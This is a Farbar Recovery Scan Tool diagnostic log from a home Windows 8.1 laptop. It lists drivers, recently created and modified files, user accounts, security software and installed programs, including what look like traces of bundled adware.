S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2015-01-19] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2015-01-19] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-01-19] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)
S3 iscFlash; \??\C:\Windows\TEMP\7zS1773.tmp\iscflashx64.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-03-04 10:04 - 2016-03-04 10:04 - 00025316 _____ C:\Users\Fawn\Desktop\FRST.txt
2016-03-04 10:02 - 2016-03-04 10:02 - 02374144 _____ (Farbar) C:\Users\Fawn\Desktop\FRST64 (2).exe
2016-03-04 09:21 - 2016-03-04 10:04 - 00000000 ____D C:\FRST
2016-03-04 09:11 - 2016-03-04 09:11 - 00000207 _____ C:\Windows\tweaking.com-regbackup-FAWNS-Windows-8.1-Connected-(64-bit).dat
2016-03-04 09:11 - 2016-03-04 09:11 - 00000000 ____D C:\RegBackup
2016-03-04 09:08 - 2016-03-04 09:08 - 00002258 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2016-03-04 09:08 - 2016-03-04 09:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2016-03-04 09:08 - 2016-03-04 09:08 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2016-03-04 09:07 - 2016-03-04 09:08 - 00016383 _____ C:\Windows\Tweaking.com - Registry Backup Setup Log.txt
2016-03-04 08:55 - 2016-03-04 09:03 - 00000000 ____D C:\AdwCleaner
2016-03-04 08:55 - 2016-03-04 08:55 - 01518592 _____ C:\Users\Fawn\Desktop\AdwCleaner.exe
2016-03-04 08:53 - 2016-03-04 08:54 - 04777232 _____ (Tweaking.com) C:\Users\Fawn\Desktop\tweaking.com_registry_backup_setup.exe
2016-03-03 19:10 - 2016-03-03 19:10 - 00000000 ____D C:\Users\Fawn\Documents\ProcAlyzer Dumps
2016-03-03 19:07 - 2016-02-08 14:17 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20160303-190723.backup
2016-03-03 17:58 - 2015-07-28 17:52 - 00821920 _____ (Safer-Networking Ltd. ) C:\Users\Public\Desktop\Post Win10 Spybot-install.exe
2016-03-03 17:56 - 2016-03-03 18:57 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-03-03 17:56 - 2016-03-03 17:56 - 00001410 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-03-03 17:56 - 2016-03-03 17:56 - 00001398 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2016-03-03 17:56 - 2016-03-03 17:56 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2016-03-03 17:56 - 2016-03-03 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-03-03 17:56 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2016-03-03 17:55 - 2016-03-03 18:01 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-03-03 17:53 - 2016-03-03 17:55 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Fawn\Desktop\spybot-2.4.exe
2016-03-03 15:06 - 2016-03-03 15:06 - 00000000 ____D C:\Windows\LastGood.Tmp
2016-03-03 13:46 - 2016-03-03 14:10 - 00000000 ____D C:\Program Files (x86)\Citrix
2016-03-03 13:45 - 2016-03-03 15:31 - 00000000 ____D C:\Users\Fawn\AppData\Local\Citrix
2016-03-03 10:39 - 2016-03-04 02:55 - 00003846 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-02-27 19:21 - 2016-02-27 19:21 - 00086062 _____ C:\Users\Fawn\Downloads\q29.pdf
2016-02-27 19:21 - 2016-02-27 19:21 - 00086062 _____ C:\Users\Fawn\Downloads\q29 (1).pdf
2016-02-23 22:15 - 2016-03-03 11:15 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-02-16 16:26 - 2016-02-16 16:26 - 00001449 _____ C:\Users\Fawn\Desktop\resume.txt
2016-02-16 16:23 - 2016-02-16 16:23 - 00000000 _____ C:\Users\Fawn\Desktop\New Text Document.txt
2016-02-16 16:18 - 2016-02-16 16:18 - 00002687 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Word Viewer 2003.lnk
2016-02-16 16:17 - 2016-02-16 16:17 - 00000000 ____D C:\Program Files (x86)\MSECache
2016-02-16 16:16 - 2016-02-16 16:16 - 25685128 _____ (Microsoft Corporation) C:\Users\Fawn\Downloads\wordview.exe
2016-02-10 11:44 - 2016-02-10 11:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-02-10 11:39 - 2016-02-10 11:39 - 00000000 ____D C:\ProgramData\Intel Security
2016-02-10 11:39 - 2016-02-10 11:39 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-02-09 13:15 - 2016-02-09 13:27 - 00000000 ____D C:\Users\Fawn\Desktop\New folder (2)
2016-02-09 13:15 - 2016-02-09 13:15 - 00000000 ____D C:\Users\Fawn\Desktop\New folder (3)
2016-02-09 11:50 - 2016-02-06 02:48 - 25839104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-02-09 11:50 - 2016-02-06 02:24 - 02887680 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-02-09 11:50 - 2016-02-06 02:01 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-02-09 11:50 - 2016-02-06 01:43 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-02-09 11:50 - 2016-02-06 01:32 - 14458368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-02-09 11:50 - 2016-02-06 01:16 - 12857856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-02-09 11:50 - 2016-02-06 01:09 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-02-09 11:50 - 2016-02-06 00:54 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-02-09 11:32 - 2016-01-10 09:50 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-02-09 11:32 - 2016-01-10 09:31 - 00162304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-02-09 11:32 - 2016-01-10 09:16 - 00898048 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2016-02-09 11:32 - 2016-01-10 09:14 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-02-09 11:32 - 2016-01-10 09:12 - 00532480 _____ (Microsoft Corporation) C:\Windows\system32\EncDec.dll
2016-02-09 11:32 - 2016-01-10 08:58 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-02-09 11:32 - 2016-01-10 08:51 - 00702976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2016-02-09 11:32 - 2016-01-10 08:49 - 00443392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EncDec.dll
2016-02-09 11:32 - 2016-01-10 08:40 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-02-09 11:32 - 2015-12-29 07:45 - 07783936 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-02-09 11:32 - 2015-12-29 07:45 - 07075328 _____ (Microsoft Corporation) C:\Windows\system32\glcndFilter.dll
2016-02-09 11:32 - 2015-12-29 07:43 - 05267968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\glcndFilter.dll
2016-02-09 11:31 - 2016-01-21 22:40 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-02-09 11:31 - 2016-01-21 22:29 - 06052352 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-02-09 11:31 - 2016-01-21 22:28 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-02-09 11:31 - 2016-01-21 22:27 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-02-09 11:31 - 2016-01-21 22:02 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-02-09 11:31 - 2016-01-21 21:55 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-02-09 11:31 - 2016-01-21 21:52 - 00099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-02-09 11:31 - 2016-01-21 21:51 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-02-09 11:31 - 2016-01-21 21:50 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-02-09 11:31 - 2016-01-21 21:48 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-02-09 11:31 - 2016-01-21 21:48 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-02-09 11:31 - 2016-01-21 21:47 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-02-09 11:31 - 2016-01-21 21:46 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-02-09 11:31 - 2016-01-21 21:35 - 04611072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-02-09 11:31 - 2016-01-21 21:31 - 02597376 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-02-09 11:31 - 2016-01-21 21:31 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-02-09 11:31 - 2016-01-21 21:28 - 02880000 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2016-02-09 11:31 - 2016-01-21 21:27 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-02-09 11:31 - 2016-01-21 21:25 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-02-09 11:31 - 2016-01-21 21:25 - 00325632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-02-09 11:31 - 2016-01-21 21:24 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-02-09 11:31 - 2016-01-21 21:08 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-02-09 11:31 - 2016-01-21 21:07 - 02120704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-02-09 11:31 - 2016-01-21 21:02 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-02-09 11:31 - 2016-01-19 11:14 - 07453024 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-02-09 11:31 - 2016-01-19 11:13 - 02175008 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-02-09 11:31 - 2016-01-19 11:13 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-02-09 11:31 - 2016-01-19 11:12 - 01737088 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-02-09 11:31 - 2016-01-19 11:12 - 01133744 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 01564496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 01501496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 00548024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-02-09 11:31 - 2016-01-19 10:15 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-02-09 11:31 - 2016-01-19 09:30 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-02-09 11:31 - 2016-01-19 08:37 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2016-02-09 11:31 - 2016-01-14 17:42 - 00033472 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-02-09 11:31 - 2016-01-14 12:44 - 01362944 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 01162240 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00696320 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00677376 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-02-09 11:31 - 2016-01-10 09:02 - 00987648 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-02-09 11:31 - 2016-01-10 08:43 - 00801792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-02-09 11:31 - 2016-01-07 10:34 - 04175872 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-02-09 11:31 - 2016-01-06 10:25 - 00140800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-02-09 11:31 - 2015-12-29 07:42 - 05264384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-02-09 11:31 - 2015-12-28 13:42 - 00713216 _____ (Microsoft Corporation) C:\Windows\system32\WinSync.dll
2016-02-09 11:31 - 2015-12-28 12:31 - 00578048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSync.dll
2016-02-09 11:29 - 2015-12-17 10:29 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2016-02-09 11:29 - 2015-12-17 08:17 - 03547648 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2016-02-08 14:19 - 2016-03-04 00:19 - 00000091 _____ C:\Users\Fawn\AppData\Roaming\WB.CFG
2016-02-08 14:17 - 2016-02-08 14:17 - 00023206 _____ C:\Windows\System32\Tasks\{7D7F0447-7D0E-0B7A-7E11-7F7D0905110F}
2016-02-08 13:26 - 2016-02-08 13:26 - 00000013 _____ C:\Users\Fawn\.pluto.tv
2016-02-08 13:25 - 2016-02-08 13:25 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-02-08 13:25 - 2016-02-08 13:25 - 00000000 ____D C:\Users\Fawn\AppData\Local\PlutoTV
2016-02-08 13:24 - 2016-02-08 14:13 - 00000000 ____D C:\Program Files (x86)\Pluto TV
2016-02-08 13:20 - 2016-02-08 13:20 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-02-08 13:19 - 2016-02-08 14:16 - 00000000 ____D C:\Users\Fawn\AppData\Roaming\RebateAll
2016-02-08 13:19 - 2016-02-08 13:19 - 00003456 _____ C:\Windows\System32\Tasks\FawnPediatricianMercuriallyV2
2016-02-08 13:19 - 2016-02-08 13:19 - 00000000 ____D C:\Users\Fawn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RebateAll
2016-02-08 13:19 - 2016-02-08 13:19 - 00000000 ____D C:\ProgramData\Unchecky
2016-02-08 13:18 - 2016-02-08 13:18 - 30510920 _____ C:\Users\Fawn\Downloads\MediaPlayerSetup [1].exe
2016-02-08 13:18 - 2016-02-08 13:18 - 00000000 ____D C:\Users\Public\Documents\Baidu
2016-02-08 13:18 - 2016-02-08 13:18 - 00000000 ____D C:\Users\Fawn\AppData\Local\IsolatedStorage
2016-02-08 13:15 - 2016-02-08 13:16 - 00970320 _____ (Software ) C:\Users\Fawn\Downloads\MediaPlayerSetup.exe
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-03-04 09:59 - 2015-11-23 22:44 - 00000918 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-04 09:13 - 2015-11-20 10:54 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-4258770641-917365270-2992294631-1001
2016-03-04 09:09 - 2014-11-20 20:42 - 00956476 _____ C:\Windows\system32\PerfStringBackup.INI
2016-03-04 09:09 - 2013-08-22 05:36 - 00000000 ____D C:\Windows\Inf
2016-03-04 09:03 - 2015-11-20 10:55 - 00000000 ___DO C:\Users\Fawn\OneDrive
2016-03-04 09:02 - 2015-11-23 22:44 - 00000914 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-04 09:02 - 2013-08-22 06:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-03-04 09:02 - 2013-08-22 06:44 - 00337976 _____ C:\Windows\system32\FNTCACHE.DAT
2016-03-04 09:02 - 2013-08-22 05:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-03-04 09:01 - 2013-08-22 05:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-03-04 05:29 - 2015-11-20 12:42 - 00003910 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{F9805CA2-ADB9-457B-9954-5CF8981F1431}
2016-03-03 20:04 - 2016-01-17 14:21 - 00000000 ____D C:\swsetup
2016-03-03 20:04 - 2015-01-19 03:46 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-03-03 20:03 - 2015-06-21 14:14 - 00000000 ____D C:\Windows\Hewlett-Packard
2016-03-03 17:58 - 2015-11-20 11:26 - 00000000 ____D C:\Program Files\Common Files\AV
2016-03-03 17:49 - 2016-02-01 18:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-03-03 17:49 - 2016-02-01 18:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-03-03 17:46 - 2016-01-17 00:40 - 00000340 _____ C:\Windows\Tasks\HPCeeScheduleForFawn.job
2016-03-03 17:31 - 2016-01-17 00:40 - 00003152 _____ C:\Windows\System32\Tasks\HPCeeScheduleForFawn
2016-03-03 15:26 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\NDF
2016-03-03 15:05 - 2015-06-21 13:59 - 07552760 _____ (Broadcom Corporation) C:\Windows\system32\Drivers\BCMWL63a.SYS
2016-03-03 15:05 - 2015-06-21 13:59 - 04155920 _____ (Broadcom Corporation) C:\Windows\system32\bcmihvsrv64.dll
2016-03-03 15:05 - 2015-06-21 13:59 - 03799080 _____ (Broadcom Corporation) C:\Windows\system32\bcmihvui64.dll
2016-03-03 15:05 - 2013-08-22 07:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-03-03 13:29 - 2015-11-20 10:47 - 00000000 ____D C:\Users\Fawn
2016-03-01 17:33 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-01 17:33 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\AppReadiness
2016-02-27 19:16 - 2015-11-25 12:16 - 00000000 ____D C:\Users\Fawn\Desktop\kmart ips
2016-02-27 15:53 - 2013-08-22 07:20 - 00000000 ____D C:\Windows\CbsTemp
2016-02-27 15:52 - 2015-11-20 10:48 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-02-27 15:52 - 2015-11-20 10:48 - 00000000 ___SD C:\Windows\system32\GWX
2016-02-26 23:51 - 2015-11-20 12:43 - 00003064 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-02-26 23:51 - 2015-11-20 12:43 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-02-25 18:48 - 2016-01-03 23:45 - 00000000 ____D C:\Users\Fawn\Desktop\family pics
2016-02-20 12:03 - 2015-11-23 22:45 - 00002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-20 12:03 - 2015-11-23 22:45 - 00002210 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-19 10:22 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\rescache
2016-02-16 16:18 - 2015-06-21 14:20 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-02-15 12:11 - 2015-11-20 10:52 - 00000000 ____D C:\Users\Fawn\AppData\Local\Hewlett-Packard
2016-02-12 21:01 - 2015-11-24 13:39 - 00000000 ____D C:\Windows\system32\appraiser
2016-02-12 21:01 - 2014-11-20 20:20 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-11 09:57 - 2015-06-21 14:18 - 00000000 ____D C:\ProgramData\McAfee
2016-02-11 09:52 - 2015-11-20 11:26 - 00003348 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-02-10 11:42 - 2015-06-21 14:18 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-02-10 11:40 - 2013-08-22 07:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-02-10 11:36 - 2015-06-21 14:18 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-02-09 14:54 - 2015-11-30 19:04 - 00000000 ____D C:\Users\Fawn\Desktop\New folder
2016-02-09 11:58 - 2015-11-24 12:53 - 00000000 ____D C:\Windows\system32\MRT
2016-02-09 11:54 - 2015-11-24 12:52 - 146614896 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-02-08 13:19 - 2013-08-22 07:36 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-02-08 13:19 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2016-02-03 10:54 - 2015-11-23 22:44 - 00003890 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-03 10:54 - 2015-11-23 22:44 - 00003654 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
==================== Files in the root of some directories =======
2016-02-08 14:19 - 2016-03-04 00:19 - 0000091 _____ () C:\Users\Fawn\AppData\Roaming\WB.CFG
Some files in TEMP:
====================
C:\Users\Fawn\AppData\Local\Temp\sqlite3.dll
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-02-19 09:37
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:04-03-2016
Ran by Fawn (2016-03-04 10:06:35)
Running from C:\Users\Fawn\Desktop
Windows 8.1 Connected (X64) (2015-11-20 18:48:54)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-4258770641-917365270-2992294631-500 - Administrator - Disabled)
Fawn (S-1-5-21-4258770641-917365270-2992294631-1001 - Administrator - Enabled) => C:\Users\Fawn
Guest (S-1-5-21-4258770641-917365270-2992294631-501 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: - Broadcom Corporation)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.0.9870 - Broadcom Corporation)
Digital Coupon Printer (HKLM-x32\...\{2CDD20A5-DFDE-4AC0-97DD-F60B1196BF98}) (Version: 3.50.0.0 - Hopster, Inc. an Inmar company)
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Documentation (HKLM-x32\...\{C925BFCB-DB7B-486A-B551-D637E054FC02}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7745.4851 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{E959FD01-BD01-4CC4-9BB8-4EBE8309BF37}) (Version: 8.1.52.1 - HP)
HP Support Solutions Framework (HKLM-x32\...\{E2CB09C1-3C76-4395-BB47-50C066535CF8}) (Version: 12.0.30.473 - HP)
HP System Event Utility (HKLM-x32\...\{D17A3B70-B75E-4C49-83D6-C17DDF65B35F}) (Version: 1.3.4 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{403E9EFF-C4B4-4308-BA4E-7093B6BA03D5}) (Version: 2.5.5 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.10.0.2210 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3925 - Intel Corporation)
Intel(R) Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.70.305.16316 - Intel Corporation)
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
McAfee LiveSafe - Internet Security (HKLM-x32\...\MSC) (Version: 14.0.7080 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM-x32\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Mozilla Firefox 44.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0 (x86 en-US)) (Version: 44.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0 - Mozilla)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29081 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7339 - Realtek Semiconductor Corp.)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.20.0 - Synaptics Incorporated)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== Scheduled Tasks (Whitelisted) =============
